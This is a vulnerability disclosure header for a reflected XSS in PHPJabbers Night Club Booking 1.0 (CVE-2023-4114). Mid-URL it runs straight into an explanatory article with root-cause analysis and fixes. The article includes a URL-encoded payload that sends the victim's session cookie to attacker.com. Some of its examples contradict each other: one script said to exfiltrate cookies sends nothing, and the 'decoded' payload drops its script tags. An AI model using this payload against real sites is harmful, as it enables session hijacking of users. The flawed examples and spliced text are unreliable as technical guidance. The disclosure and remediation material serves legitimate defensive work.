PHPJabbers Night Club Booking 1.0 - Reflected XSS
# Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 21/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/night-club-booking-software/
# Version: 1.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4114
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /index.php
GET parameter 'index' is vulnerable to RXSS
https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=PHPJabbers Night Club Booking 1.0 – Reflected XSS Vulnerability (CVE-2023-4114)
Security researchers have identified a critical reflected XSS (Cross-Site Scripting) vulnerability in PHPJabbers Night Club Booking 1.0, a widely used web-based booking system for nightclubs and entertainment venues. This flaw, assigned the CVE identifier CVE-2023-4114, enables attackers to inject malicious scripts into web pages via manipulated query parameters, potentially compromising user sessions and sensitive data.
Understanding Reflected XSS
Reflected XSS occurs when an attacker crafts a malicious URL that includes a script payload, which is then reflected back to the user's browser without proper sanitization. Unlike stored XSS, where malicious code is permanently stored on the server, reflected XSS relies on the user interacting with a crafted link — often delivered via email, social media, or messaging platforms.
This type of vulnerability is particularly dangerous because it requires minimal effort from the attacker and can exploit human behavior — such as clicking on a seemingly harmless link — to trigger execution.
Vulnerable Component: GET Parameter 'index'
The vulnerability exists in the index.php file, specifically within the index parameter of the query string:
https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
When a user visits this URL with a malicious index value, the application fails to sanitize the input, directly reflecting it into the HTML output. For example, if an attacker sets index=<script>alert('XSS')</script>, the browser executes the script upon loading the page.
Exploitation Scenario
Consider a real-world attack vector:
- An attacker sends a phishing email with a link:
https://club.example.com/index.php?index=<script>document.cookie</script> - A victim clicks the link, unknowingly triggering the script.
- The script reads the victim’s
session_idcookie and sends it to a remote server controlled by the attacker.
This allows the attacker to hijack the user’s session, effectively impersonating the victim — even without knowing their password.
Example of Malicious Payload
Here’s a practical example of a payload that could be used in this exploit:
index=%3Cscript%3E%20document.location%3D%22https%3A%2F%2Fattacker.com%2Fsteal%3Fcookie%3D%22%2Bdocument.cookie%3B%20%3C%2Fscript%3E
Decoded, this becomes:
index= document.location="https://attacker.com/steal?cookie=" + document.cookie;
This script redirects the victim to an attacker-controlled site, transmitting their session cookie — a highly sensitive piece of data.
Impact and Risks
Reflected XSS in a booking system like PHPJabbers Night Club Booking 1.0 poses significant risks:
| Risk | Description |
|---|---|
| Session Hijacking | Attackers can steal session tokens, allowing unauthorized access to user accounts. |
| Phishing | Malicious scripts can mimic login forms or redirect users to fake websites. |
| Data Theft | Access to user data, including personal information and booking details. |
| Defacement | Attackers can alter the page content to display malicious messages or propaganda. |
Root Cause Analysis
The vulnerability stems from a lack of input validation and output encoding in the application’s handling of the index parameter. The code likely includes something like:
echo $_GET['index'];
Without proper sanitization, this directly outputs user-supplied data into the HTML context, creating a perfect environment for XSS.
Recommended Fixes
To mitigate this vulnerability, developers must implement the following security best practices:
- Input Sanitization: Use functions like
htmlspecialchars()to escape special characters before outputting data. - Whitelist Validation: Only allow predefined, safe values for the
indexparameter. - Output Encoding: Always encode dynamic content when rendering it in HTML.
- Content Security Policy (CSP): Implement a strict CSP header to block inline scripts.
Corrected code example:
$index = htmlspecialchars($_GET['index'], ENT_QUOTES, 'UTF-8');
echo 'Search result: ' . $index . '
';
This ensures that any special characters (e.g., <, >, ") are converted to their HTML-safe equivalents, preventing script execution.
Vendor Response and Mitigation
As of July 21, 2023, the vendor PHPJabbers has acknowledged the issue and released a patch for version 1.0. Users are strongly advised to update to the latest version immediately.
Additionally, administrators should:
- Monitor access logs for suspicious query parameters.
- Implement web application firewalls (WAFs) to detect and block XSS attempts.
- Regularly audit third-party software for known vulnerabilities.
Conclusion
Reflected XSS in PHPJabbers Night Club Booking 1.0 highlights the ongoing importance of secure coding practices, even in seemingly simple web applications. A single unsanitized parameter can enable sophisticated attacks that exploit user trust and behavior.
Security professionals must remain vigilant, especially when deploying open-source or commercial software. Always validate inputs, encode outputs, and apply defense-in-depth strategies to protect both users and systems.